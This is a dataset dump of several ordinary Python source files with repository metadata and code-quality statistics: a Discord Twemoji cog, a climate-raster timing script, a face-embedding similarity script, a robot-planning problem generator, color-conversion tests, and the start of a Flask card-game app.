hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c915f05bb0ce24d1fe5469fea260ce3e99ceb13c
| 5,144
|
py
|
Python
|
bot/exts/utilities/twemoji.py
|
thatbirdguythatuknownot/sir-lancebot
|
7fd74af261385bdf7d989f459bec4c9b0cb4392a
|
[
"MIT"
] | 77
|
2018-11-19T18:38:50.000Z
|
2020-11-16T22:49:59.000Z
|
bot/exts/utilities/twemoji.py
|
thatbirdguythatuknownot/sir-lancebot
|
7fd74af261385bdf7d989f459bec4c9b0cb4392a
|
[
"MIT"
] | 373
|
2018-11-17T16:06:06.000Z
|
2020-11-20T22:55:03.000Z
|
bot/exts/utilities/twemoji.py
|
thatbirdguythatuknownot/sir-lancebot
|
7fd74af261385bdf7d989f459bec4c9b0cb4392a
|
[
"MIT"
] | 165
|
2018-11-19T04:04:44.000Z
|
2020-11-18T17:53:28.000Z
|
import logging
import re
from typing import Literal, Optional
import discord
from discord.ext import commands
from emoji import UNICODE_EMOJI_ENGLISH, is_emoji
from bot.bot import Bot
from bot.constants import Colours, Roles
from bot.utils.decorators import whitelist_override
from bot.utils.extensions import invoke_help_command
log = logging.getLogger(__name__)
BASE_URLS = {
"png": "https://raw.githubusercontent.com/twitter/twemoji/master/assets/72x72/",
"svg": "https://raw.githubusercontent.com/twitter/twemoji/master/assets/svg/",
}
CODEPOINT_REGEX = re.compile(r"[a-f1-9][a-f0-9]{3,5}$")
class Twemoji(commands.Cog):
"""Utilities for working with Twemojis."""
def __init__(self, bot: Bot):
self.bot = bot
@staticmethod
def get_url(codepoint: str, format: Literal["png", "svg"]) -> str:
"""Returns a source file URL for the specified Twemoji, in the corresponding format."""
return f"{BASE_URLS[format]}{codepoint}.{format}"
@staticmethod
def alias_to_name(alias: str) -> str:
"""
Transform a unicode alias to an emoji name.
Example usages:
>>> alias_to_name(":falling_leaf:")
"Falling leaf"
>>> alias_to_name(":family_man_girl_boy:")
"Family man girl boy"
"""
name = alias.strip(":").replace("_", " ")
return name.capitalize()
@staticmethod
def build_embed(codepoint: str) -> discord.Embed:
"""Returns the main embed for the `twemoji` commmand."""
emoji = "".join(Twemoji.emoji(e) or "" for e in codepoint.split("-"))
embed = discord.Embed(
title=Twemoji.alias_to_name(UNICODE_EMOJI_ENGLISH[emoji]),
description=f"{codepoint.replace('-', ' ')}\n[Download svg]({Twemoji.get_url(codepoint, 'svg')})",
colour=Colours.twitter_blue,
)
embed.set_thumbnail(url=Twemoji.get_url(codepoint, "png"))
return embed
@staticmethod
def emoji(codepoint: Optional[str]) -> Optional[str]:
"""
Returns the emoji corresponding to a given `codepoint`, or `None` if no emoji was found.
The return value is an emoji character, such as "🍂". The `codepoint`
argument can be of any format, since it will be trimmed automatically.
"""
if code := Twemoji.trim_code(codepoint):
return chr(int(code, 16))
@staticmethod
def codepoint(emoji: Optional[str]) -> Optional[str]:
"""
Returns the codepoint, in a trimmed format, of a single emoji.
`emoji` should be an emoji character, such as "🐍" and "🥰", and
not a codepoint like "1f1f8". When working with combined emojis,
such as "🇸🇪" and "👨👩👦", send the component emojis through the method
one at a time.
"""
if emoji is None:
return None
return hex(ord(emoji)).removeprefix("0x")
@staticmethod
def trim_code(codepoint: Optional[str]) -> Optional[str]:
"""
Returns the meaningful information from the given `codepoint`.
If no codepoint is found, `None` is returned.
Example usages:
>>> trim_code("U+1f1f8")
"1f1f8"
>>> trim_code("\u0001f1f8")
"1f1f8"
>>> trim_code("1f466")
"1f466"
"""
if code := CODEPOINT_REGEX.search(codepoint or ""):
return code.group()
@staticmethod
def codepoint_from_input(raw_emoji: tuple[str, ...]) -> str:
"""
Returns the codepoint corresponding to the passed tuple, separated by "-".
The return format matches the format used in URLs for Twemoji source files.
Example usages:
>>> codepoint_from_input(("🐍",))
"1f40d"
>>> codepoint_from_input(("1f1f8", "1f1ea"))
"1f1f8-1f1ea"
>>> codepoint_from_input(("👨👧👦",))
"1f468-200d-1f467-200d-1f466"
"""
raw_emoji = [emoji.lower() for emoji in raw_emoji]
if is_emoji(raw_emoji[0]):
emojis = (Twemoji.codepoint(emoji) or "" for emoji in raw_emoji[0])
return "-".join(emojis)
emoji = "".join(
Twemoji.emoji(Twemoji.trim_code(code)) or "" for code in raw_emoji
)
if is_emoji(emoji):
return "-".join(Twemoji.codepoint(e) or "" for e in emoji)
raise ValueError("No codepoint could be obtained from the given input")
@commands.command(aliases=("tw",))
@whitelist_override(roles=(Roles.everyone,))
async def twemoji(self, ctx: commands.Context, *raw_emoji: str) -> None:
"""Sends a preview of a given Twemoji, specified by codepoint or emoji."""
if len(raw_emoji) == 0:
await invoke_help_command(ctx)
return
try:
codepoint = self.codepoint_from_input(raw_emoji)
except ValueError:
raise commands.BadArgument(
"please include a valid emoji or emoji codepoint."
)
await ctx.send(embed=self.build_embed(codepoint))
def setup(bot: Bot) -> None:
"""Load the Twemoji cog."""
bot.add_cog(Twemoji(bot))
| 34.066225
| 110
| 0.614891
| 633
| 5,144
| 4.909953
| 0.322275
| 0.023166
| 0.028958
| 0.021236
| 0.1287
| 0.083655
| 0.061133
| 0.034749
| 0
| 0
| 0
| 0.01918
| 0.260109
| 5,144
| 150
| 111
| 34.293333
| 0.793221
| 0.278771
| 0
| 0.092105
| 0
| 0.013158
| 0.123513
| 0.035377
| 0
| 0
| 0
| 0
| 0
| 1
| 0.118421
| false
| 0
| 0.131579
| 0
| 0.394737
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9188684a1a8b8220b62b9249ea8815fc31f7412
| 2,621
|
py
|
Python
|
experimentations/20-climate-data/test-perf.py
|
Kitware/spark-mpi-experimentation
|
9432b63130059fc54843bc5ca6f2f5510e5a4098
|
[
"BSD-3-Clause"
] | 4
|
2017-06-15T16:36:01.000Z
|
2021-12-25T09:13:22.000Z
|
experimentations/20-climate-data/test-perf.py
|
Kitware/spark-mpi-experimentation
|
9432b63130059fc54843bc5ca6f2f5510e5a4098
|
[
"BSD-3-Clause"
] | 1
|
2018-09-28T23:32:42.000Z
|
2018-09-28T23:32:42.000Z
|
experimentations/20-climate-data/test-perf.py
|
Kitware/spark-mpi-experimentation
|
9432b63130059fc54843bc5ca6f2f5510e5a4098
|
[
"BSD-3-Clause"
] | 6
|
2017-07-22T00:10:00.000Z
|
2021-12-25T09:13:11.000Z
|
from __future__ import print_function
import os
import sys
import time
import gdal
import numpy as np
# -------------------------------------------------------------------------
# Files to process
# -------------------------------------------------------------------------
fileNames = [
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2006.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2007.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2008.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2009.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2010.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2011.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2012.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2013.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2014.tif',
'tasmax_day_BCSD_rcp85_r1i1p1_MRI-CGCM3_2015.tif',
]
basepath = '/data/sebastien/SparkMPI/data/gddp'
# -------------------------------------------------------------------------
# Read file and output (year|month, temp)
# -------------------------------------------------------------------------
def readFile(fileName):
year = fileName.split('_')[-1][:-4]
print('year', year)
dataset = gdal.Open('%s/%s' % (basepath, fileName))
for bandId in range(dataset.RasterCount):
band = dataset.GetRasterBand(bandId + 1).ReadAsArray()
for value in band.flatten():
yield (year, value)
# -----------------------------------------------------------------------------
def readFileAndCompute(fileName):
year = fileName.split('_')[-1][:-4]
print('year', year)
dataset = gdal.Open('%s/%s' % (basepath, fileName))
total = 0
count = 0
for bandId in range(dataset.RasterCount):
band = dataset.GetRasterBand(bandId + 1).ReadAsArray()
for value in band.flatten():
if value < 50000:
total += value
count += 1
return (year, total / count)
# -----------------------------------------------------------------------------
def readDoNothing(fileName):
year = fileName.split('_')[-1][:-4]
print('year', year)
dataset = gdal.Open('%s/%s' % (basepath, fileName))
for bandId in range(dataset.RasterCount):
band = dataset.GetRasterBand(bandId + 1).ReadAsArray()
print(band.shape)
# -------------------------------------------------------------------------
# Read timing
# -------------------------------------------------------------------------
t0 = time.time()
for fileName in fileNames:
readDoNothing(fileName)
t1 = time.time()
print('### Total execution time - %s ' % str(t1 - t0))
| 33.177215
| 79
| 0.518123
| 267
| 2,621
| 4.831461
| 0.299625
| 0.069767
| 0.100775
| 0.139535
| 0.648062
| 0.648062
| 0.648062
| 0.623256
| 0.37907
| 0.37907
| 0
| 0.054652
| 0.155284
| 2,621
| 78
| 80
| 33.602564
| 0.528004
| 0.254865
| 0
| 0.326923
| 0
| 0
| 0.290722
| 0.259794
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057692
| false
| 0
| 0.115385
| 0
| 0.192308
| 0.115385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c91fcc058836389aa81c0420f1fedf01f1106ff3
| 1,699
|
py
|
Python
|
similarity.py
|
Blair-Johnson/faceswap
|
79b75f7f112acb3bf6b228116facc4d0812d2099
|
[
"MIT"
] | null | null | null |
similarity.py
|
Blair-Johnson/faceswap
|
79b75f7f112acb3bf6b228116facc4d0812d2099
|
[
"MIT"
] | null | null | null |
similarity.py
|
Blair-Johnson/faceswap
|
79b75f7f112acb3bf6b228116facc4d0812d2099
|
[
"MIT"
] | 1
|
2021-11-04T08:21:07.000Z
|
2021-11-04T08:21:07.000Z
|
# Blair Johnson 2021
from facenet_pytorch import InceptionResnetV1, MTCNN
import numpy as np
def create_embeddings(images):
'''
Take an iterable of image candidates and return an iterable of image embeddings.
'''
if type(images) != list:
images = [images]
extractor = MTCNN()
encoder = InceptionResnetV1(pretrained='vggface2').eval()
embeddings = []
for image in images:
cropped_img = extractor(image)
embeddings.append(encoder(cropped_img.unsqueeze(0)))
return embeddings
def candidate_search(candidates, target):
'''
Take an iterable of candidates and a target image and determine the best candidate fit
'''
cand_embs = create_embeddings(candidates)
target_embs = create_embeddings(target)[0]
best_loss = np.inf
best_candidate = np.inf
for i,embedding in enumerate(cand_embs):
loss = np.linalg.norm(target_embs.detach().numpy()-embedding.detach().numpy(), ord='fro')
if loss < best_loss:
best_loss = loss
best_candidate = i
return candidates[i], best_candidate
if __name__ == '__main__':
from PIL import Image
import matplotlib.pyplot as plt
test1 = np.array(Image.open('/home/bjohnson/Pictures/fake_face.jpg'))
test2 = np.array(Image.open('/home/bjohnson/Pictures/old_face.jpg'))
test3 = np.array(Image.open('/home/bjohnson/Pictures/young_face.jpg'))
target = np.array(Image.open('/home/bjohnson/Pictures/profile_pic_lake_louise.png'))
candidates = [test1,test2,test3]
chosen, index = candidate_search(candidates, target)
print(index)
#plt.imshow(candidate_search(candidates, target))
| 29.807018
| 97
| 0.683343
| 211
| 1,699
| 5.345972
| 0.412322
| 0.056738
| 0.042553
| 0.056738
| 0.12766
| 0.12766
| 0.12766
| 0
| 0
| 0
| 0
| 0.011161
| 0.208946
| 1,699
| 56
| 98
| 30.339286
| 0.828125
| 0.138317
| 0
| 0
| 0
| 0
| 0.126397
| 0.113128
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0
| 0.121212
| 0
| 0.242424
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c920d8ceac18d8c9ff46fde63a7fa287e05e877b
| 6,075
|
py
|
Python
|
opentamp/domains/robot_manipulation_domain/generate_base_prob.py
|
Algorithmic-Alignment-Lab/openTAMP
|
f0642028d551d0436b3a3dbc3bfb2f23a00adc14
|
[
"MIT"
] | 4
|
2022-02-13T15:52:18.000Z
|
2022-03-26T17:33:13.000Z
|
opentamp/domains/robot_manipulation_domain/generate_base_prob.py
|
Algorithmic-Alignment-Lab/OpenTAMP
|
eecb950bd273da8cbed4394487630e8453f2c242
|
[
"MIT"
] | 1
|
2022-02-13T22:48:09.000Z
|
2022-02-13T22:48:09.000Z
|
opentamp/domains/robot_manipulation_domain/generate_base_prob.py
|
Algorithmic-Alignment-Lab/OpenTAMP
|
eecb950bd273da8cbed4394487630e8453f2c242
|
[
"MIT"
] | null | null | null |
from IPython import embed as shell
import itertools
import numpy as np
import random
# SEED = 1234
NUM_PROBS = 1
NUM_CLOTH = 4
filename = "probs/base_prob.prob"
GOAL = "(RobotAt baxter robot_end_pose)"
# init Baxter pose
BAXTER_INIT_POSE = [0, 0, 0]
BAXTER_END_POSE = [0, 0, 0]
R_ARM_INIT = [0, 0, 0, 0, 0, 0, 0] # [0, -0.8436, -0.09, 0.91, 0.043, 1.5, -0.05] # [ 0.1, -1.36681967, -0.23718529, 1.45825713, 0.04779009, 1.48501637, -0.92194262]
L_ARM_INIT = [0, 0, 0, 0, 0, 0, 0] # [-0.6, -1.2513685 , -0.63979997, 1.41307933, -2.9520384, -1.4709618, 2.69274026]
OPEN_GRIPPER = [0.02]
CLOSE_GRIPPER = [0.015]
MONITOR_LEFT = [np.pi/4, -np.pi/4, 0, 0, 0, 0, 0]
MONITOR_RIGHT = [-np.pi/4, -np.pi/4, 0, 0, 0, 0, 0]
CLOTH_ROT = [0, 0, 0]
TABLE_GEOM = [1.23/2, 2.45/2, 0.97/2]
TABLE_POS = [1.23/2-0.1, 0, 0.97/2-0.375-0.665]
TABLE_ROT = [0,0,0]
ROBOT_DIST_FROM_TABLE = 0.05
REGION1 = [np.pi/4]
REGION2 = [0]
REGION3 = [-np.pi/4]
REGION4 = [-np.pi/2]
cloth_init_poses = np.ones((NUM_CLOTH, 3)) * 0.615
cloth_init_poses = cloth_init_poses.tolist()
def get_baxter_pose_str(name, LArm = L_ARM_INIT, RArm = R_ARM_INIT, G = OPEN_GRIPPER, Pos = BAXTER_INIT_POSE):
s = ""
s += "(left {} {}), ".format(name, LArm)
s += "(left_gripper {} {}), ".format(name, G)
s += "(right {} {}), ".format(name, RArm)
s += "(right_gripper {} {}), ".format(name, G)
s += "(value {} {}), ".format(name, Pos)
return s
def get_baxter_str(name, LArm = L_ARM_INIT, RArm = R_ARM_INIT, G = OPEN_GRIPPER, Pos = BAXTER_INIT_POSE):
s = ""
s += "(geom {})".format(name)
s += "(left {} {}), ".format(name, LArm)
s += "(left_gripper {} {}), ".format(name, G)
s += "(right {} {}), ".format(name, RArm)
s += "(right_gripper {} {}), ".format(name, G)
s += "(pose {} {}), ".format(name, Pos)
return s
def get_undefined_robot_pose_str(name):
s = ""
s += "(left {} undefined), ".format(name)
s += "(left_gripper {} undefined), ".format(name)
s += "(right {} undefined), ".format(name)
s += "(right_gripper {} undefined), ".format(name)
s += "(value {} undefined), ".format(name)
return s
def get_undefined_symbol(name):
s = ""
s += "(value {} undefined), ".format(name)
s += "(rotation {} undefined), ".format(name)
return s
def main():
for iteration in range(NUM_PROBS):
s = "# AUTOGENERATED. DO NOT EDIT.\n# Configuration file for CAN problem instance. Blank lines and lines beginning with # are filtered out.\n\n"
s += "# The values after each attribute name are the values that get passed into the __init__ method for that attribute's class defined in the domain configuration.\n"
s += "Objects: "
s += "Baxter (name baxter); "
for i in range(NUM_CLOTH):
s += "Cloth (name {}); ".format("cloth{0}".format(i))
s += "ClothTarget (name {}); ".format("cloth_target_{0}".format(i))
s += "ClothTarget (name {}); ".format("cloth{0}_init_target".format(i))
s += "ClothTarget (name {}); ".format("cloth{0}_end_target".format(i))
s += "BaxterPose (name {}); ".format("cloth_grasp_begin".format(i))
s += "BaxterPose (name {}); ".format("cloth_grasp_end".format(i))
s += "BaxterPose (name {}); ".format("cloth_putdown_begin".format(i))
s += "BaxterPose (name {}); ".format("cloth_putdown_end".format(i))
s += "ClothTarget (name {}); ".format("middle_target_1")
s += "ClothTarget (name {}); ".format("middle_target_2")
s += "ClothTarget (name {}); ".format("left_mid_target")
s += "ClothTarget (name {}); ".format("right_mid_target")
s += "BaxterPose (name {}); ".format("robot_init_pose")
s += "BaxterPose (name {}); ".format("robot_end_pose")
s += "Obstacle (name {}) \n\n".format("table")
s += "Init: "
for i in range(NUM_CLOTH):
s += "(geom cloth{0}), ".format(i)
s += "(pose cloth{0} {1}), ".format(i, [0, 0, 0])
s += "(rotation cloth{0} {1}), ".format(i, [0, 0, 0])
s += "(value cloth{0}_init_target [0, 0, 0]), ".format(i)
s += "(rotation cloth{0}_init_target [0, 0, 0]), ".format(i)
s += "(value cloth_target_{0} [0, 0, 0]), ".format(i)
s += "(rotation cloth_target_{0} [0, 0, 0]), ".format(i)
s += "(value cloth{0}_end_target [0, 0, 0]), ".format(i)
s += "(rotation cloth{0}_end_target [0, 0, 0]), ".format(i)
s += "(value middle_target_1 [0, 0, 0]), "
s += "(rotation middle_target_1 [0, 0, 0]), "
s += "(value middle_target_2 [0, 0, 0]), "
s += "(rotation middle_target_2 [0, 0, 0]), "
s += "(value left_mid_target [0, 0, 0]), "
s += "(rotation left_mid_target [0, 0, 0]), "
s += "(value right_mid_target [0, 0, 0]), "
s += "(rotation right_mid_target [0, 0, 0]), "
s += get_undefined_robot_pose_str("cloth_grasp_begin".format(i))
s += get_undefined_robot_pose_str("cloth_grasp_end".format(i))
s += get_undefined_robot_pose_str("cloth_putdown_begin".format(i))
s += get_undefined_robot_pose_str("cloth_putdown_end".format(i))
s += get_baxter_str('baxter', L_ARM_INIT, R_ARM_INIT, OPEN_GRIPPER, BAXTER_INIT_POSE)
s += get_baxter_pose_str('robot_init_pose', L_ARM_INIT, R_ARM_INIT, OPEN_GRIPPER, BAXTER_INIT_POSE)
# s += get_baxter_pose_str('robot_end_pose', L_ARM_INIT, R_ARM_INIT, OPEN_GRIPPER, BAXTER_END_POSE)
s += get_undefined_robot_pose_str('robot_end_pose')
s += "(geom table {}), ".format(TABLE_GEOM)
s += "(pose table {}), ".format(TABLE_POS)
s += "(rotation table {}); ".format(TABLE_ROT)
s += "(RobotAt baxter robot_init_pose),"
s += "(StationaryBase baxter), "
s += "(IsMP baxter), "
s += "(WithinJointLimit baxter), "
s += "(StationaryW table) \n\n"
s += "Goal: {}".format(GOAL)
with open(filename, "w") as f:
f.write(s)
if __name__ == "__main__":
main()
| 41.047297
| 175
| 0.576461
| 893
| 6,075
| 3.698768
| 0.164614
| 0.039964
| 0.037239
| 0.020587
| 0.57584
| 0.495913
| 0.442022
| 0.363003
| 0.261278
| 0.236452
| 0
| 0.063698
| 0.227325
| 6,075
| 147
| 176
| 41.326531
| 0.639966
| 0.055144
| 0
| 0.169492
| 0
| 0.016949
| 0.38322
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042373
| false
| 0.008475
| 0.033898
| 0
| 0.110169
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9210c12cb167b3a01782592accbb83cee14ae03
| 2,633
|
py
|
Python
|
tests/views/test_hsva.py
|
ju-sh/colorviews
|
b9757dd3a799d68bd89966852f36f06f21e36072
|
[
"MIT"
] | 5
|
2021-06-10T21:12:16.000Z
|
2022-01-14T05:04:03.000Z
|
tests/views/test_hsva.py
|
ju-sh/colorviews
|
b9757dd3a799d68bd89966852f36f06f21e36072
|
[
"MIT"
] | null | null | null |
tests/views/test_hsva.py
|
ju-sh/colorviews
|
b9757dd3a799d68bd89966852f36f06f21e36072
|
[
"MIT"
] | null | null | null |
import pytest
from colorviews import AlphaColor
class TestGetAttr:
@pytest.mark.parametrize("attr, expected", [
("h", 0.75),
("s", 0.47),
("v", 0.29),
("a", 0.79),
])
def test_valid(self, attr, expected):
color = AlphaColor.from_hsva(0.75, 0.47, 0.29, 0.79)
assert round(getattr(color.hsva, attr), 4) == expected
@pytest.mark.parametrize("attr", [
"r", "b",
])
def test_invalid(self, attr):
color = AlphaColor.from_hsva(0.75, 0.47, 0.29, 0.79)
with pytest.raises(AttributeError):
getattr(color.hsva, attr)
class TestSetAttr:
@pytest.mark.parametrize("attr, val", [
("h", 0.75),
("s", 0.5),
("v", 0.29),
("a", 0.49),
])
def test_valid(self, attr, val):
color = AlphaColor.from_hsva(0.45, 0.15, 0.89, 0.79)
setattr(color.hsva, attr, val)
assert round(getattr(color.hsva, attr), 4) == val
@pytest.mark.parametrize("attr", [
"r", "g",
])
def test_invalid(self, attr):
color = AlphaColor.from_hsva(0.75, 0.47, 0.29, 0.79)
with pytest.raises(AttributeError):
setattr(color.hsva, attr, 0.1)
@pytest.mark.parametrize("hsva_dict, expected", [
({"h": 91 / 360}, 0x394a2980),
({"s": 0.15}, 0x443f4a80),
({"v": 0.74}, 0x9268bd80),
({"a": 0.80}, 0x39294acc),
({"h": 91 / 360, "s": 0.15}, 0x444a3f80),
({"h": 91 / 360, "v": 0.74}, 0x91bd6880),
({"h": 91 / 360, "v": 0.74, "a": 0.25}, 0x91bd6840),
({"s": 0.15, "v": 0.74}, 0xafa0bd80),
({"h": 91 / 360, "s": 0.15, "v": 0.74}, 0xaebda080),
])
def test_replace(hsva_dict, expected):
color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.5)
assert int(color.hsva.replace(**hsva_dict)) == expected
class TestVals:
@pytest.mark.parametrize("vals", [
[0.2, 0.4, 0.6, 0.1],
(0.6, 0.2, 0.4, 0.54),
])
def test_setter_valid(self, vals):
color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.79)
color.hsva.vals = vals
assert [round(val, 4) for val in color.hsva] == list(vals)
@pytest.mark.parametrize("wrong_vals", [
[0.2, 0.4],
(1.6, 0.2, 0.4),
(0.6, 0.2, 0.4, 1.0, 0.8),
])
def test_setter_invalid(self, wrong_vals):
color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.79)
with pytest.raises(ValueError):
color.hsva.vals = wrong_vals
def test_vals_getter():
vals = (0.75, 0.45, 0.29, 0.79)
color = AlphaColor.from_hsva(0.75, 0.45, 0.29, 0.79)
assert [round(val, 4) for val in color.hsva.vals] == list(vals)
| 29.920455
| 67
| 0.545765
| 399
| 2,633
| 3.538847
| 0.190476
| 0.021246
| 0.107649
| 0.130312
| 0.540368
| 0.431303
| 0.386686
| 0.320113
| 0.308782
| 0.251416
| 0
| 0.146565
| 0.253703
| 2,633
| 87
| 68
| 30.264368
| 0.57201
| 0
| 0
| 0.315068
| 0
| 0
| 0.034941
| 0
| 0
| 0
| 0.034182
| 0
| 0.068493
| 1
| 0.109589
| false
| 0
| 0.027397
| 0
| 0.178082
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c92170ef42c7d1d4c09bcc11c88becf053c48250
| 2,645
|
py
|
Python
|
app/__init__.py
|
Cinquiom/fifty-cents-frontend
|
946f564a87127f5820111321cd48441cc414d277
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
Cinquiom/fifty-cents-frontend
|
946f564a87127f5820111321cd48441cc414d277
|
[
"MIT"
] | null | null | null |
app/__init__.py
|
Cinquiom/fifty-cents-frontend
|
946f564a87127f5820111321cd48441cc414d277
|
[
"MIT"
] | null | null | null |
import random, logging
from collections import Counter
from flask import Flask, session, request, render_template, jsonify
from app.util import unflatten
from app.fiftycents import FiftyCentsGame
from app.fiftycents import Card
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
app = Flask(__name__)
app.secret_key = 'peanut'
game = FiftyCentsGame(2)
